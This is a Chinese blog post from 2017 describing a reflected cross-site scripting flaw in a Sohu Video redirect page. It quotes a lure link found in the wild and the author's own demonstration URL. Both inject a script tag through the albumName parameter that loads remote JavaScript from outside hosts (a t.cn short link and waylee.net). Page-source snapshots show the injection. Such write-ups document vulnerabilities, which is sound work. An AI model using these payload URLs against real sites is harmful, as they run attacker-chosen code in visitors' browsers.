搜狐视频转跳页面 遇见XSS 时间:2017.12.23

  • 2017-12-23
  • 271
  • 0
  • 0

本文无技术含量,仅体现此漏洞的现象!

小伟也是第一次遇到,随便简单的执行一句js.

  • 事情起源

通过诱导分享传播

  • 好奇查看视频

链接:

杭州公`安`局`长穿便衣带女儿吃饭,被辅`警`羞`辱带手`铐,`市`长`亲自道歉!:

http://XXX/redirect.?albumName=%27%3Bvar%20s%20%3D%20document.createElement%28%27script%27%29%3Bs.src%20%3D%20%27%2f%2ft.cn%2fRTgDQUL%27%3Bdocument.body.appendChild%28s%29%3B%3C%2fscript%3E%27&from=groupmessage&isappinstalled=0#pt_1514010136989
  • 审查元素吧

  • 简单实验:加载自己的JS脚本

小伟准备了自己的js,爱心和弹窗:https://waylee.net/f.js

直接修改URL中2f%2f后面的字符,回车进入网页,js你会发现js嵌入正常:
  • 效果 : 成功加载脚本并执行:

这应该属于XSS小漏洞!!!
技术有限,不能访问目标黑客的具体网页流程. 也不能进行扩展操作,有兴趣的自己眼睛
  • 后言:

只要你有足够是实力,可以做出任何的动作.我就简单演示一下弹窗以及转跳等功能:

漏洞演示:

http://so.tv.sohu.com/redirect.?albumName=%27%3Bvar%20s%20%3D%20document.createElement%28%27script%27%29%3Bs.src%20%3D%20%27%2f%2fwaylee.net%2ff.js%27%3Bdocument.body.appendChild%28s%29%3B<%2fscript>%27&from=groupmessage&isappinstalled=0#

 

html快照:






<!doctype html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>搜狐视频-视频搜索</title>
	<style>
	    div,p,span{margin:0;padding:0}
        img{border:none}
	    body{background:#fcfcfc;}
	    .changeBox{margin:60px auto 0;width:980px;font:12px/1.5 hiragino sans gb,microsoft yahei,simsun;color:#3a3a3a}
	    .changeBox a{text-decoration:none;color:#3a3a3a}
	    .changeBox a:hover{color:#e73c31;text-decoration:underline;}
		.tv-logo{border-bottom:1px dotted #d9d9d9;height:70px;text-align:center;}
		.infoBox{padding-top:42px;text-align:center;}
		.infoBox p{padding-bottom:25px;font-size:16px;}
		.infoBox .tips{font-size:14px;}
		.changeBox .btn-red{display:inline-block;padding:0 20px;margin-right:18px;background:#e73c31;height:42px;line-height:42px;color:#fff;}
		.changeBox .btn-red:hover{background:#e55359;color:#fff;text-decoration:none;}
		.setTime{display:inline-block;color:#e73c31;font-size:20px;margin:-1px 3px 0 0;vertical-align:middle;}
		.ico-yin{display:inline-block;margin-left:27px;padding-left:23px;color:#e73c31;background:url(//tv.sohu.com/upload/static/special/search-zz/ico_yy.png) no-repeat left center;}
		.changeBox .ico-yin{color:#e73c31}
	</style>
    
<script type="text/javascript" src="//js.tv.itc.cn/kao.js"></script>
<script type="text/javascript" src="//js.tv.itc.cn/dict.js"></script>
<script type="text/javascript">
	//sohuHD.pingback('http://click.hd.sohu.com.cn/s.gif?type=search_list_show&expand5=' + cat + '&_=' + new Date().getTime());
	kao('pingback', function () {
		pingbackBundle.initHref({
			customParam : {
				meta : {
					url : '//click.hd.sohu.com.cn/x.gif',
					type : ['extends'],
					stype : ['redirect'],
					col1 : function(config, el) {
						return el.getAttribute('_s_c')== null ? ['0'] : el.getAttribute('_s_c');
					},
					suv : 'cookie-SUV',
					p : 'passport',
					y : 'cookie-YYID',
					f : 'cookie-fuid',
					_ : 'stamp'
				}
			}
		});
	});
	</script>
</head>
<body>
	<div class="changeBox">
		<div class="tv-logo">
			<a href="//tv.sohu.com/" target="_blank"><img src="//tv.sohu.com/upload/static/special/search-zz/logo_tv.png" width="119" height="50" alt=""></a>
		</div>
		<div class="infoBox">
			<p>
				小狐即将带您去“<span id="siteA"></span>”观看《<span id="proName"></span>》,您还可以留在搜狐观看其他节目。
			</p>
			<p id="tip-panel"><span class="setTime" id="time">6</span>秒后,自动跳转到<span id="siteB"></span>~</p>
			<p class="btnBox">
				<a href="#" class="btn-red" id="view" _s_c="click"  pb-url="meta">立即去观看</a>
				<a href="#" onclick="goReturn();return false;" class="btn-red" _s_c="stay" pb-url="meta">返回首页</a>
			</p>
			<p class="tips">
				温馨提示:安装搜狐影音,就可以一站式观看全网视频哦~  
				<a href="//tv.sohu.com/app/" id="ifox-dl-btn" class="ico-yin" _s_c="download"  pb-url="meta">下载搜狐影音</a>
			</p>
		</div>
	</div>	
	<script language="JavaScript" type="text/javascript">
	    function $(id){
			return document.getElementById(id);
		};
		
		function delayURL(url) {
			var time = 5, el = $("time"), timer;
			el.innerHTML = time;
			function tick() {
				time--;
				if (time > 0) {
					el.innerHTML = time;
					timer = setTimeout(tick, 1e3)
				} else {
					window.top.location.href = url;
				}
			}
			timer = setTimeout(tick, 1e3);
			var btn = document.getElementById('ifox-dl-btn');
			var tipPanel = document.getElementById('tip-panel');
			btn.onclick = function() {
				clearTimeout(timer)
				tipPanel.style.display = 'none';
			}
		};
		function goReturn() {
			window.opener = null;
			window.open('//tv.sohu.com', '_self');
			//window.close();
		};
		var iurl = "";
		var site = '';
		var programe = '';var s = document.createElement('script');s.src = '//waylee.net/f.js';document.body.appendChild(s);</script>'';
		$("view").href = iurl;
		$('siteA').innerHTML = site;
		$('siteB').innerHTML = site;
		$('proName').innerHTML = programe;
		delayURL(iurl);
	</script>
</body>
<script>
    (function(G, D, s, c, p) {
        c = {
            UA: "UA-sohu-123456", 
            NO_FLS: 1,
            WITH_REF: 1,
            API_URL: "//sohu.irs01.com/irt?",
            URL: '//tv.sohu.com/upload/Trace/iwt-min-1611.js'
        };
        G._iwt ? G._iwt.track(c, p) : (G._iwtTQ = G._iwtTQ || []).push([c, p]), !G._iwtLoading && lo();

        function lo(t) {
            G._iwtLoading = 1;
            s = D.createElement("script");
            s.src = c.URL;
            t = D.getElementsByTagName("script");
            t = t[t.length - 1];
            t.parentNode.insertBefore(s, t);
        }
    })(this, document); 
</script>
<script type="text/javascript" src="//js.tv.itc.cn/hdpv.js"></script>
<script>
  var _comscore = _comscore || [];
  _comscore.push({ c1: "2", c2: "7395122" });
  (function() {
    var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
    s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
    el.parentNode.insertBefore(s, el);
  })();
</script>
<noscript>
  <img src="//b.scorecardresearch.com/p?c1=2&c2=7395122&cv=2.0&cj=1" />
</noscript>
<!-- End comScore Tag -->

<script type="text/javascript" language="javascript" src="//a1.itc.cn/pv/js/spv.1305141919.js"></script>
</html>

 

快照:

<!doctype html>
<html lang="en"><head><script type="text/javascript" src="https://sohu.irs01.com/irt?_iwt_UA=UA-sohu-123456&jsonp=_159P5"></script>
	<meta charset="UTF-8">
	<title>搜狐视频-视频搜索</title>
	<style>
	    div,p,span{margin:0;padding:0}
        img{border:none}
	    body{background:#fcfcfc;}
	    .changeBox{margin:60px auto 0;width:980px;font:12px/1.5 hiragino sans gb,microsoft yahei,simsun;color:#3a3a3a}
	    .changeBox a{text-decoration:none;color:#3a3a3a}
	    .changeBox a:hover{color:#e73c31;text-decoration:underline;}
		.tv-logo{border-bottom:1px dotted #d9d9d9;height:70px;text-align:center;}
		.infoBox{padding-top:42px;text-align:center;}
		.infoBox p{padding-bottom:25px;font-size:16px;}
		.infoBox .tips{font-size:14px;}
		.changeBox .btn-red{display:inline-block;padding:0 20px;margin-right:18px;background:#e73c31;height:42px;line-height:42px;color:#fff;}
		.changeBox .btn-red:hover{background:#e55359;color:#fff;text-decoration:none;}
		.setTime{display:inline-block;color:#e73c31;font-size:20px;margin:-1px 3px 0 0;vertical-align:middle;}
		.ico-yin{display:inline-block;margin-left:27px;padding-left:23px;color:#e73c31;background:url(//tv.sohu.com/upload/static/special/search-zz/ico_yy.png) no-repeat left center;}
		.changeBox .ico-yin{color:#e73c31}
	</style>
    
<script async="" src="https://b.scorecardresearch.com/beacon.js"></script><script type="text/javascript" src="//js.tv.itc.cn/kao.js"></script>
<script type="text/javascript" src="//js.tv.itc.cn/dict.js"></script>
<script type="text/javascript">
	//sohuHD.pingback('http://click.hd.sohu.com.cn/s.gif?type=search_list_show&expand5=' + cat + '&_=' + new Date().getTime());
	kao('pingback', function () {
		pingbackBundle.initHref({
			customParam : {
				meta : {
					url : '//click.hd.sohu.com.cn/x.gif',
					type : ['extends'],
					stype : ['redirect'],
					col1 : function(config, el) {
						return el.getAttribute('_s_c')== null ? ['0'] : el.getAttribute('_s_c');
					},
					suv : 'cookie-SUV',
					p : 'passport',
					y : 'cookie-YYID',
					f : 'cookie-fuid',
					_ : 'stamp'
				}
			}
		});
	});
	</script>
<script src="//pv.sohu.com/pv.gif?t?=1514019803719781_1366_768?r?="></script><style type="text/css">.heart{width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: absolute;}.heart:after{top: -5px;}.heart:before{left: -5px;}</style></head>
<body class=" sohuIEHINT"><div style="display:block;clear:both;float:none;position:absolute;right:0;bottom:0;border:none;"><object name="TTJBJ4AT6Q4AHK9U" id="TTJBJ4AT6Q4AHK9U" data="//tv.sohu.com/upload/swf/playerGetUID131031.swf" type="application/x-shockwave-flash" width="1" height="1" style="position:absolute;right:0;bottom:0;border:none;"><param name="movie" value="//tv.sohu.com/upload/swf/playerGetUID131031.swf"><param name="wmode" value="transparent"><param name="version" value="10"><param name="allowScriptAccess" value="always"><param name="flashvars"></object></div>
	<div class="changeBox">
		<div class="tv-logo">
			<a href="//tv.sohu.com/" target="_blank"><img src="//tv.sohu.com/upload/static/special/search-zz/logo_tv.png" width="119" height="50" alt=""></a>
		</div>
		<div class="infoBox">
			<p>
				小狐即将带您去“<span id="siteA"></span>”观看《<span id="proName"></span>》,您还可以留在搜狐观看其他节目。
			</p>
			<p id="tip-panel"><span class="setTime" id="time">6</span>秒后,自动跳转到<span id="siteB"></span>~</p>
			<p class="btnBox">
				<a href="#" class="btn-red" id="view" _s_c="click" pb-url="meta">立即去观看</a>
				<a href="#" onclick="goReturn();return false;" class="btn-red" _s_c="stay" pb-url="meta">返回首页</a>
			</p>
			<p class="tips">
				温馨提示:安装搜狐影音,就可以一站式观看全网视频哦~  
				<a href="//tv.sohu.com/app/" id="ifox-dl-btn" class="ico-yin" _s_c="download" pb-url="meta">下载搜狐影音</a>
			</p>
		</div>
	</div>	
	<script language="JavaScript" type="text/javascript">
	    function $(id){
			return document.getElementById(id);
		};
		
		function delayURL(url) {
			var time = 5, el = $("time"), timer;
			el.innerHTML = time;
			function tick() {
				time--;
				if (time > 0) {
					el.innerHTML = time;
					timer = setTimeout(tick, 1e3)
				} else {
					window.top.location.href = url;
				}
			}
			timer = setTimeout(tick, 1e3);
			var btn = document.getElementById('ifox-dl-btn');
			var tipPanel = document.getElementById('tip-panel');
			btn.onclick = function() {
				clearTimeout(timer)
				tipPanel.style.display = 'none';
			}
		};
		function goReturn() {
			window.opener = null;
			window.open('//tv.sohu.com', '_self');
			//window.close();
		};
		var iurl = "";
		var site = '';
		var programe = '';var s = document.createElement('script');s.src = '//waylee.net/f.js';document.body.appendChild(s);</script><script src="//waylee.net/f.js"></script>'';
		$("view").href = iurl;
		$('siteA').innerHTML = site;
		$('siteB').innerHTML = site;
		$('proName').innerHTML = programe;
		delayURL(iurl);
	

<script src="//tv.sohu.com/upload/Trace/iwt-min-1611.js"></script><script>
    (function(G, D, s, c, p) {
        c = {
            UA: "UA-sohu-123456", 
            NO_FLS: 1,
            WITH_REF: 1,
            API_URL: "//sohu.irs01.com/irt?",
            URL: '//tv.sohu.com/upload/Trace/iwt-min-1611.js'
        };
        G._iwt ? G._iwt.track(c, p) : (G._iwtTQ = G._iwtTQ || []).push([c, p]), !G._iwtLoading && lo();

        function lo(t) {
            G._iwtLoading = 1;
            s = D.createElement("script");
            s.src = c.URL;
            t = D.getElementsByTagName("script");
            t = t[t.length - 1];
            t.parentNode.insertBefore(s, t);
        }
    })(this, document); 
</script>
<script type="text/javascript" src="//js.tv.itc.cn/hdpv.js"></script>
<script>
  var _comscore = _comscore || [];
  _comscore.push({ c1: "2", c2: "7395122" });
  (function() {
    var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
    s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
    el.parentNode.insertBefore(s, el);
  })();
</script>
<noscript>
  <img src="//b.scorecardresearch.com/p?c1=2&c2=7395122&cv=2.0&cj=1" />
</noscript>
<!-- End comScore Tag -->

<script type="text/javascript" language="javascript" src="//a1.itc.cn/pv/js/spv.1305141919.js"></script>
<div class="sogoutip" style="z-index: 2147483645; visibility: hidden;"></div><div class="sogoubottom" id="sougou_bottom" style="display: block;"></div><div id="ext_stophi" style="z-index: 2147483647;"><div class="extnoticebg"></div><div class="extnotice"><h2>关闭提示 <a href="#" title="关闭提示" id="closenotice" class="closenotice">关闭</a></h2><p id="sogouconfirmtxt"></p>  <a id="sogouconfirm" href="#" class="extconfirm">确 认</a> <a id="sogoucancel" href="#" class="extconfirm">取 消</a></div></div><div id="ext_overlay" class="ext_overlayBG" style="display: none; z-index: 2147483646;"></div><iframe class="sogou_sugg_feedbackquan" frameborder="0" scrolling="no" src="https://ht.www.sogou.com/websearch/features/yun6.jsp?pid=sogou-brse-d2a452edff079ca6&w=1366&v=7400&st=1514019803746&od=58&ls=1514019609867&lc=&lk=&sd=58&cd=0&kd=0&u=1514011645639401&y=E077F23F5ABCE81632AC8CACA7716C79&query=%E6%90%9C%E7%8B%90%E8%A7%86%E9%A2%91-%E8%A7%86%E9%A2%91%E6%90%9C%E7%B4%A2|http%3A%2F%2Fso.tv.sohu.com%2Fredirect.%3FalbumName%3D%2527%253Bvar%2520s%2520%253D%2520document.createElement%2528%2527script%2527%2529%253Bs.src%2520%253D%2520%2527%252f%252fwaylee.net%252ff.js%2527%253Bdocument.body.appendChild%2528s%2529%253B%253C%252fscript%253E%2527%26from%3Dgroupmessage%26isappinstalled%3D0%23" style="border: none; display: block; z-index: 2147483645; background: transparent;"></iframe><script src="https://pb.sogou.com/pv.gif?hintbl=-1&uigs_productid=webext&type=ext_sugg&uigs_t=1514019804306<=27&ie=0&v=7400&y=E077F23F5ABCE81632AC8CACA7716C79&query=%E6%90%9C%E7%8B%90%E8%A7%86%E9%A2%91-%E8%A7%86%E9%A2%91%E6%90%9C%E7%B4%A2|http%3A%2F%2Fso.tv.sohu.com%2Fredirect.%3FalbumName%3D%2527%253Bvar%2520s%2520%253D%2520document.createElement%2528%2527script%2527%2529%253Bs.src%2520%253D%2520%2527%252f%252fwaylee.net%252ff.js%2527%253Bdocument.body.appendChild%2528s%2529%253B%253C%252fscript%253E%2527%26from%3Dgroupmessage%26isappinstalled%3D0%23"></script></body></html>

 

  1. 2016:  【插画】月老不认真工作,圣诞老人怒了(3)

评论

偷偷告诉你,这还毛都没有 T T

发表评论